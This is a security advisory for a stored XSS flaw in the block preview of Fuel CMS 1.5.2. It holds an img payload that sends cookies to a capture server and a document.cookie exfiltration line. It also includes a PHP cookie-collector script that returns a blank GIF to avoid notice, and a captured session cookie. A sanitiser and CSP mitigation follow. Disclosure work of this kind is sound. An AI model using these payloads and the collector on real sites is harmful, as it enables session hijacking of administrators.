Fuel CMS 1.5.2 | Stored XSS in block preview

Basic Information

Software Type: Web App
Software Name: Fuel CMS
Affected Version: 1.5.2
Software Vendor: Daylight Studio
Software Link: https://github.com/daylightstudio/FUEL-CMS
Severity: High
CVSS Score: 8.2
CVE Link: https://www.cve.org/CVERecord?id=CVE-2024-57605
Affected Assets: 100+
Date of Discovery: Jan 08, 2025

Description

Fuel CMS 1.5.2 uses a text editor for publishing pages and creating blocks. The editor has a Preview feature that lets a moderator or admin render a page or block before publishing it.
The preview renders the saved editor content as-is, so any HTML or JavaScript a user embeds in a block is executed in the browser of whoever previews it. Because the payload is stored with the block, this is a stored XSS rather than a one-off reflected one.

Reproduce

To demonstrate the impact, the steps below use a small PHP cookie-capture script: any browser that is made to request it has its cookies written to a log file.
Save the script from the following gist as capture.php:
https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd

Serve the file with PHP's built-in web server:
php -S 0.0.0.0:1718
Log in to Fuel CMS and open the Blocks section:
http://127.0.0.1/fuelcms/fuel/blocks
Create a block, then open it for editing:
http://127.0.0.1/fuelcms/fuel/blocks/edit/1
In the View field (the larger textarea used to edit the block's content), enter the following payload and save it:
<img src='http://127.0.0.1:1718/capture.php' alt='dune'>
A plain image tag is enough here because browsers scope cookies to the host, not the port: a request to 127.0.0.1:1718 carries the same cookies as the CMS on 127.0.0.1, including ci_session. Against a collector on a different host the payload would instead need script that reads document.cookie and sends it out, which only works if the session cookie is not marked HttpOnly.

Now click the Preview button; the PHP server logs the request that the previewing browser makes to capture.php:

[Wed Jan  8 10:09:20 2025] 127.0.0.1:53440 Accepted
[Wed Jan  8 10:09:20 2025] 127.0.0.1:53440 [200]: GET /capture.php
[Wed Jan  8 10:09:20 2025] 127.0.0.1:53440 Closing

Open cookie_log.txt to see the captured cookies, including the ci_session session cookie:
[2025-01-08 15:09:20] Cookies: _ga_90PNJH7CQ5=GS1.1.1735826854.1.1.1735826858.0.0.0; _ga=GA1.1.305814098.1735826855; ci_session=r0qirem7e4s1ascfhp4v60a82i02vlnr
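The gist linked in the first step is not reproduced on this page. The script below is an added stand-in written for this edit, not the author's capture.php, and it goes slightly beyond the page's same-host case: it logs cookies that arrive in the Cookie request header (what the `<img>` PoC above delivers, because cookies are scoped to the host rather than the port) and also cookies passed in a `c` query parameter, which a script payload such as `new Image().src='http://collector/capture.php?c='+encodeURIComponent(document.cookie)` would use when the collector sits on another origin (that path assumes the session cookie is not HttpOnly). The log file name and line format are assumptions chosen to resemble the page's cookie_log.txt output.

```php
<?php
// Added example: stand-in cookie collector for the PoC above, not the author's gist.
// Serve it exactly as the page does:  php -S 0.0.0.0:1718
//
// Two capture paths:
//   1. Cookie request header: the browser attaches the CMS's cookies to the <img>
//      request when the collector shares the CMS's host (cookies ignore the port).
//   2. ?c=<document.cookie>: used by a script payload when the collector is on a
//      different origin; assumes the session cookie is not HttpOnly.

$logFile = __DIR__ . '/cookie_log.txt';   // assumption: same name as the page's log

$headerCookies = $_SERVER['HTTP_COOKIE'] ?? '';
$paramCookies  = isset($_GET['c']) ? (string) $_GET['c'] : '';

$entries = [];
if ($headerCookies !== '') {
    $entries[] = 'Cookies: ' . $headerCookies;
}
if ($paramCookies !== '') {
    $entries[] = 'Cookies (via ?c=): ' . $paramCookies;
}

if ($entries !== []) {
    // One line per hit, e.g. "[2025-01-08 15:09:20] Cookies: ci_session=... from 127.0.0.1"
    $line = sprintf(
        "[%s] %s from %s\n",
        date('Y-m-d H:i:s'),
        implode(' | ', $entries),
        $_SERVER['REMOTE_ADDR'] ?? 'unknown'
    );
    file_put_contents($logFile, $line, FILE_APPEND | LOCK_EX);
}

// Answer with a real 1x1 transparent GIF so the injected <img> renders without a
// broken-image icon that might alert the person previewing the block.
header('Content-Type: image/gif');
header('Cache-Control: no-store');
echo base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7');
```

Because the response is a valid image and uncacheable, every preview produces a fresh log line rather than a single cached hit, which is what you want when confirming the issue against several moderator sessions.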

Proof of Concept (PoC) Video

PoC Exploit

N/A

Mitigation

Escape or sanitise editor content before rendering it in the preview: if blocks are only meant to hold images, apply an allowlist that accepts nothing but `<img>` elements with http(s) sources and drops every other element and attribute. In addition, serve the preview with a strict Content-Security-Policy so that inline script and loads from foreign origins are blocked even if a payload gets past the filter.
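The following is an added example of the two layers described in the mitigation, written for this edit and not taken from Fuel CMS. preview_vulnerable() models the behaviour the advisory describes (content echoed into the preview unchanged); sanitize_image_only() is an allowlist that rebuilds `<img>` elements with http(s) sources from scratch, escapes all text and discards everything else; send_preview() adds a CSP as the second layer. All function names, the image-only policy and the CSP directives are assumptions; tighten or loosen the allowlist to the block types you actually serve.

```php
<?php
// Added example for the mitigation above; not Fuel CMS code. Function names are assumptions.

function preview_vulnerable(string $content): string
{
    return $content;   // the advisory's behaviour: stored HTML/JS reaches the moderator untouched
}

function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Allowlist sanitiser: keeps only <img src="http(s)://..." alt="..."> and escaped text.
function sanitize_image_only(string $html): string
{
    $dom  = new DOMDocument();
    $prev = libxml_use_internal_errors(true);   // tolerate the broken markup attackers send
    // Wrap the fragment in a <div> so it parses predictably; the prolog forces UTF-8.
    $dom->loadHTML('<?xml encoding="UTF-8"?><div>' . $html . '</div>',
        LIBXML_HTML_NOIMPLIED | LIBXML_HTML_NODEFDTD);
    libxml_clear_errors();
    libxml_use_internal_errors($prev);

    $root = $dom->getElementsByTagName('div')->item(0);   // our wrapper comes first in document order
    return $root === null ? '' : render_allowed($root);
}

function render_allowed(DOMNode $node): string
{
    $out = '';
    foreach ($node->childNodes as $child) {
        if ($child instanceof DOMText) {
            $out .= esc($child->wholeText);                 // text is always escaped
        } elseif ($child instanceof DOMElement) {
            $tag = strtolower($child->tagName);
            if ($tag === 'img') {
                $src = trim($child->getAttribute('src'));
                // Absolute http(s) only: rejects javascript:, data: and scheme-relative tricks.
                if (preg_match('#^https?://#i', $src) === 1) {
                    // Rebuilt from scratch, so onerror/onload and every other attribute vanish.
                    $out .= '<img src="' . esc($src) . '" alt="' . esc($child->getAttribute('alt')) . '">';
                }
            } elseif ($tag !== 'script' && $tag !== 'style') {
                $out .= render_allowed($child);             // unknown tag: drop it, keep escaped children
            }
            // <script> and <style> are dropped together with their content.
        }
        // Comments and processing instructions are discarded.
    }
    return $out;
}

function send_preview(string $content): void
{
    // Second layer. No 'unsafe-inline', so inline script cannot run; 'self' is origin-scoped
    // (scheme, host AND port), so a collector on 127.0.0.1:1718 is blocked even when the
    // CMS itself runs on 127.0.0.1. Assumption: the preview only needs the CMS's own assets.
    header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'");
    header('X-Content-Type-Options: nosniff');
    echo sanitize_image_only($content);
}

// Usage: php preview.php   (constructed inputs; the first is the page's own PoC payload)
if (PHP_SAPI === 'cli') {
    foreach ([
        "<img src='http://127.0.0.1:1718/capture.php' alt='dune'>",
        "<img src=x onerror=alert(document.cookie)>",
        "<script>alert(1)</script><p>hi <img src='javascript:alert(1)'></p>",
    ] as $input) {
        echo "IN : $input\nOUT: ", sanitize_image_only($input), "\n\n";
    }
}
```

Note that the page's own payload survives the sanitiser, since it is a well-formed image with an http source; it is the CSP's origin-scoped `'self'` that stops the browser from fetching it from port 1718. That is why the two layers belong together: the allowlist removes script execution, the policy removes the exfiltration channel that a bare image still provides.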

Patch

Follow the GitHub issue below for updates on a patch:
https://github.com/daylightstudio/FUEL-CMS/issues/610



Posted on: January 10, 2025 08:29 PM